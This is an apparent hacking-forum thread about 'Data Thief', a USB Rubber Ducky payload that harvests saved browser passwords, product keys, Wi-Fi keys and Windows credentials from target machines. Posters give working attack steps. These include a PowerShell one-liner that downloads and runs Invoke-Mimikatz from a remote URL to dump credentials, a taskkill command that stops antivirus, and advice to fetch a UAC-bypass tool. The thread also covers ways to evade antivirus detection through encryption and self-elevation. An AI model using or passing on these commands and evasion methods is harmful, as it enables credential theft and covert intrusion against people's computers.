[Payload] DT 2.5 (2.6 released in a few weeks) - Backup Passwords, Product Keys, Directory Listings and much more!

[Allucard]

hello lavanoid

i'm having a problem with the payload, the SP.bat version 1.6 isn't doing everything it should like getting the pass dump and the chrome pass and more, but the SP.bat 1.5 is working fine.

I have changed the setting inside the SP.bat trough all the combination possible and nothing, i'm running a win7 64 bit and reminding that i run the version 1.5 fine.

Thank's for the good work

[UnKn0wnBooof]

hello lavanoid

i'm having a problem with the payload, the SP.bat version 1.6 isn't doing everything it should like getting the pass dump and the chrome pass and more, but the SP.bat 1.5 is working fine.

I have changed the setting inside the SP.bat trough all the combination possible and nothing, i'm running a win7 64 bit and reminding that i run the version 1.5 fine.

Thank's for the good work

I've just uploaded another update. One of the batch labels in the SP.bat file were misspelt. My keyboard didn't enter the "_" for the 64_bit label. Should be working perfectly now. Comment if you encounter any more issues.

[Allucard]

thank's and one other thing that i only check today with the previously version but if i try to do that in one unprivileged user the windows ask for the password of the admin, is there anyway around it???

[UnKn0wnBooof]

thank's and one other thing that i only check today with the previously version but if i try to do that in one unprivileged user the windows ask for the password of the admin, is there anyway around it???

Well, without Administrative access, the only things the payload can do really is get Chrome login data, and Windows product keys. The procdump won't work because it requires access to another programs ram data - which needs admin access, Mimikatz won't work because once again - needs access to another programs ram data, and wifi keys cannot be recovered because of Microsofts encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine - it won't work. So the answear to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want.

[Allucard]

Lavanoid

hello how are you???

what happen or better question why did you no longer have the payload available???

can i do anything to help???

[MB60893]

Well, without Administrative access, the only things the payload can do really is get Chrome login data, and Windows product keys. The procdump won't work because it requires access to another programs ram data - which needs admin access, Mimikatz won't work because once again - needs access to another programs ram data, and wifi keys cannot be recovered because of Microsofts encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine - it won't work. So the answear to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want.

You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft security essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)

Edited January 20, 2014 by MB60893

[UnKn0wnBooof]

Lavanoid

hello how are you???

what happen or better question why did you no longer have the payload available???

can i do anything to help???

I removed the payload because of reasons that I currently don't want to discuss. All I'm saying is - its a secret . I also think that people should realize how much potential this payload has, compared to the other simple payloads out there. My aim is to make the ultimate payload. Anyway, any help would be appreciated. Do you have any ideas of what else I could add? Any example scripts that I could manifest into the current system batch file would be cool. By "System batch file", I mean the SP.bat file.

I'll re-upload the payload within a week or two. You might be wondering why so long. Well - like I said, a secret .

Edited January 20, 2014 by Lavanoid

[mw3demo]

I removed the payload because of reasons that I currently don't want to discuss. All I'm saying is - its a secret . I also think that people should realize how much potential this payload has, compared to the other simple payloads out there. My aim is to make the ultimate payload. Anyway, any help would be appreciated. Do you have any ideas of what else I could add? Any example scripts that I could manifest into the current system batch file would be cool. By "System batch file", I mean the SP.bat file.

I'll re-upload the payload within a week or two. You might be wondering why so long. Well - like I said, a secret .

Looking forward to it. :) You have done a bunch of great work on the earlier versions, and spent a considerable amount of time fine tuning. OSX Payload next? :P

Keep it up!

[UnKn0wnBooof]

You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft security essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)

HHHmmmmm. Seems like a good idea to implement Metasploit in the payload - however, I'd need support from a group of people who have different antivirus programs. Then I'd need them to write batch files that can successfully terminate the AV user interface. Then I'd need them to make notes of what service their AV programs run under - this way, once elevation has been granted (through Metasploit) - we could just kill the AV services.

If you manage to successfully get a script that can be added to the payload which has Metasploit implemented, then that would be great. I don't have much time to tinker with Metasploit so it would be great if you guys can mess around with it instead.

Great idea though :D .

[UnKn0wnBooof]

Looking forward to it. :) You have done a bunch of great work on the earlier versions, and spent a considerable amount of time fine tuning. OSX Payload next? :P

Keep it up!

Thanks. As for OSX, unfortunately - I don't have a OSX system :( otherwise I would have definitely created a payload for mac systems too. However, I have been looking into how the mac OS works by Googleing a lot. It's a lot like Linux (Is it Linux based?). Anyway, if I ever get my hands on a Apple computer (Maybe in the next 2/3 years? - I'm not someone with much money ) I'll let you know.

[MB60893]

Hi again Lavanoid,

You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 

You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well!

Give it a go!

MB60893.

Edited January 20, 2014 by MB60893

[UnKn0wnBooof]

Hi again Lavanoid,

You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 

You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well!

Give it a go!

MB60893.

I used Mimikatz in the previous versions of Data Thief, but it does trigger Microsoft Security essentials (Why pay for antivirus?). I bypassed this issue by storing Mimikatz in a encrypted zip archive then when needed, 7-zip would decrypt the archive and then run Mimikatz, the advantage of this is that since the Duck RW speeds are slow, antivirus cannot scan the Duck because it is in use by 7-Zip and Mimikatz. Some (if not all) people think its bad that the Duck has slow RW speeds, but I think it gives us the advantage. The advantage of procdump is that it doesn't trigger AV, but it can be slow :/.

Another thing is - Mimikatz doesn't work with Windows 8.1 due to the new security enhancements. I don;t have Windows 8, but I did try it on a friends PC. I would have Windows 8 but they have a OEM key (they key you get when you buy a computer) so I can't activate it - I need a genuine Windows key :/. Anyway - back to the main subject. Mimikatz has been implemented in data thief already. Thanks anyway though :D .

Before I release DT (Data Thief) - I recommend installing the Duck 4CAP firmware (you can get it on Ducky Decode). I recommend it because if Windows takes its time installing the drivers (Common with netbook computers), you don't have to worry about it exceeding the delay time.

[Sabri]

Really thanks for your job, sir.

The payloads works fine for me, but it's detected from my AV: Avira Free that has been put in Real-Time mode.

You or anyone else knows how to circumvent this problem stealthly?

Thanks again.

[UnKn0wnBooof]

Really thanks for your job, sir.

The payloads works fine for me, but it's detected from my AV: Avira Free that has been put in Real-Time mode.

You or anyone else knows how to circumvent this problem stealthly?

Thanks again.

Is it possible that you send me your backup log, tell me what file was detected by your AV and send the installation parameters? E.g. Installation path like: "C:\Program Files\Antivirus", Service name: "Antivirus Service", and most important, the AV exe name: "AntivirusUI.exe" or/and "AntivirusSVC.exe".

A directory listing of your antivirus programs installation path would be cool. You can do this by running cmd.exe, then use this command:

DIR "C:\Program Files\Antivirus" > "%USERPROFILE%\Desktop\DirectoryListing.txt"

You would obviously have to edit the directory part.

Thanks for the bug report :D

Edited February 9, 2014 by Lavanoid

[Sabri]

Is it possible that you send me your backup log, tell me what file was detected by your AV and send the installation parameters? E.g. Installation path like: "C:\Program Files\Antivirus", Service name: "Antivirus Service", and most important, the AV exe name: "AntivirusUI.exe" or/and "AntivirusSVC.exe".

A directory listing of your antivirus programs installation path would be cool. You can do this by running cmd.exe, then use this command:

DIR "C:\Program Files\Antivirus" > "%USERPROFILE%\Desktop\DirectoryListing.txt"

You would obviously have to edit the directory part.

Thanks for the bug report :D

There is no backup log because it stops after the indication that windows update has started.

The file detected is: "SCRIPT_EX.exe" as a "TR/ATRAPS.Gen".

The Antivirus folder is: C:\Program Files (x86)\Avira\AntiVir Desktop

The dir content is here: http://speedy.sh/ENee9/DirectoryListing.txt

Let me know if this is enough!

[UnKn0wnBooof]

There is no backup log because it stops after the indication that windows update has started.

The file detected is: "SCRIPT_EX.exe" as a "TR/ATRAPS.Gen".

The Antivirus folder is: C:\Program Files (x86)\Avira\AntiVir Desktop

The dir content is here: http://speedy.sh/ENee9/DirectoryListing.txt

Let me know if this is enough!

HHHmmm. So I guess I'd have to find a different way of executing the the Data Thief batch file. I could write a program with Visual Basic but unfortunately, I no longer have the required tools to write a program because my netbook hard drive got fried :/. I could try writing a self elevating batch script. I realized that the Slax Linux installer batch file has the ability to self elevate. I'll look into it. I guess AV picks up the SCRIPT_EX.exe file as a virus because its a compiled batch script and a lot of people compile batch scripts for malicious purposes. I compiled it with Abyss Quick Batch File Compiler. I'll see if I can release a fix within the next few days.

Thanks.

[Sabri]

HHHmmm. So I guess I'd have to find a different way of executing the the Data Thief batch file. I could write a program with Visual Basic but unfortunately, I no longer have the required tools to write a program because my netbook hard drive got fried :/. I could try writing a self elevating batch script. I realized that the Slax Linux installer batch file has the ability to self elevate. I'll look into it. I guess AV picks up the SCRIPT_EX.exe file as a virus because its a compiled batch script and a lot of people compile batch scripts for malicious purposes. I compiled it with Abyss Quick Batch File Compiler. I'll see if I can release a fix within the next few days.

Thanks.

Thanks a lot in advance for your effort and for taking care of my situation.

[UnKn0wnBooof]

Thanks a lot in advance for your effort and for taking care of my situation.

I believe I have solved your problem. I edited the SCRIPT_EX.bat file to be able to self elevate itself so the SCRIPT_EX.exe file is no longer needed. I've also edited the Installer.bat and Compiler.bat so that newly created inject.bin files are written to execute SCRIPT_EX.bat instead of SCRIPT_EX.exe.

Just download the update, extract it, remove SCRIPT_EX.exe from the duck as well as inject.bin; then run Installer.bat to copy the required files.

Hope this update works ;)

[Sabri]

I believe I have solved your problem. I edited the SCRIPT_EX.bat file to be able to self elevate itself so the SCRIPT_EX.exe file is no longer needed. I've also edited the Installer.bat and Compiler.bat so that newly created inject.bin files are written to execute SCRIPT_EX.bat instead of SCRIPT_EX.exe.

Just download the update, extract it, remove SCRIPT_EX.exe from the duck as well as inject.bin; then run Installer.bat to copy the required files.

Hope this update works ;)

Sadly, now the AV detects nctstart.exe and Execute_ncstart.exe as TR/ATRAPS.Gen :(

[UnKn0wnBooof]

Sadly, now the AV detects nctstart.exe and Execute_ncstart.exe as TR/ATRAPS.Gen :(

I believe I've just fixed the problem. I'll upload the update within the next 12 hours as I currently don't have the time to do so. I've also edited the NetCat Terminal.bat file so it has more functions than the previous versions :D .

Hope this update will solve your problems ;) .

[Epoc]

Thanks for all your great work Lavanoid !

About your question on the first page,

"I've been looking around the duck forums and found this payload (https://forums.hak5....r-rubber-ducky/), I think its a really cool payload since it seems to support a wider range of programs that can be backed up - However, that being said; It doesn't support XP, neither does it have many precautions of avoiding AV, so - Do you prefer this payload or the Mr Grays payload?"

I would like to believe in the creation of a fusion with your ducky script and the Mr Grays payload's script. For my opinon, it's a great combination if it's possible !

[UnKn0wnBooof]

Thanks for all your great work Lavanoid !

About your question on the first page,

"I've been looking around the duck forums and found this payload (https://forums.hak5....r-rubber-ducky/), I think its a really cool payload since it seems to support a wider range of programs that can be backed up - However, that being said; It doesn't support XP, neither does it have many precautions of avoiding AV, so - Do you prefer this payload or the Mr Grays payload?"

I would like to believe in the creation of a fusion with your ducky script and the Mr Grays payload's script. For my opinon, it's a great combination if it's possible !

Indeed, a fusion of the scripts is definitely possible. Although AV will detect the programs, I am going to deal with that issue by fusing all the programs as one and then encrypt them so that when they run, AV won't know what it is.

[Epoc]

Indeed, a fusion of the scripts is definitely possible. Although AV will detect the programs, I am going to deal with that issue by fusing all the programs as one and then encrypt them so that when they run, AV won't know what it is.

Thank you very much for the answer ! However, i found that the most of applications contained in the packet of Mr Grays are outdated. For example, the latest version of PasswordFox app of Nirsoft's site have the abilities to detecting passwords on a machine running Windows 7 64bit, unlike the first app in the original package. That's all, and thank you again for this wonderful work !

[Sabri]

Thanks a lot Lavanoid, now it works perfectly to me!

[UnKn0wnBooof]

Thanks a lot Lavanoid, now it works perfectly to me!

That's great to hear :D .